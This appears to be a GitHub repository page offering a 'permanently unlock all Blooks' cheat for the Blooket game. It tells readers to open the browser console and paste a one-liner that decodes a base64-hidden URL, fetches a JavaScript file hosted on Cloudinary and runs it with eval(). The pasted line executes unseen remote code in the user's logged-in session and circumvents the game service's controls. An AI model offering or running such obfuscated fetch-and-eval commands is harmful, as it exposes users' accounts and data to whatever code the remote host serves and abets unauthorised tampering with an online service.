rebound37 / BlooketUnlockAllPerm

13 stars 47 forks source link

Paused in debugger

if you run one of the codes and get this: image don't worry all you have to do is go to the sources tab: image and click this: image top right, lastly click this: image to get out of debugger

unlockAllBlooksPermanetly.js

Open console (ctrl + shift + j) and paste the following:

fetch(atob("aHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZG0yaG9hNDVxL3Jhdy91cGxvYWQvdjE2Mzg1NjczNzkvdW5sb2NrQWxsUGVybV9iZW5peTMuanM=")).then((res) => res.text().then((t) => eval(t)))